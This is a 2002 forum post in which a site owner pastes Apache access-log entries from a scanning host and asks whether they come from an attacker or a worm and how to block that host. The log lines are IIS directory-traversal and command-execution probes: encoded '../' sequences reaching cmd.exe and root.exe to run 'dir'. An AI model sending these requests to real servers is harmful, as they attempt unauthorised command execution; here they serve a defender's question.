apache access.log

**blakdeth77** · December 1st, 2002, 07:37 PM

So... ah... from the strings I see here from my access log... I'm guessing this was either some skiddie trying to get in or... maybe a virus trying to spread itself... is that an accurate assumption or...?

66.128.109.148 - - [27/Nov/2002:23:20:22 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:22 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:23 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:23 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:24 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:24 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:25 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:28 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:28 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:29 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"

And is there a way for me to make apache just deny any requests from this other machine? I've found quite a few more and I think another host is actually doing this same routine as we speak.

Thread: apache access.log

Thread Tools

Display

Hybrid View

apache access.log

Posting Permissions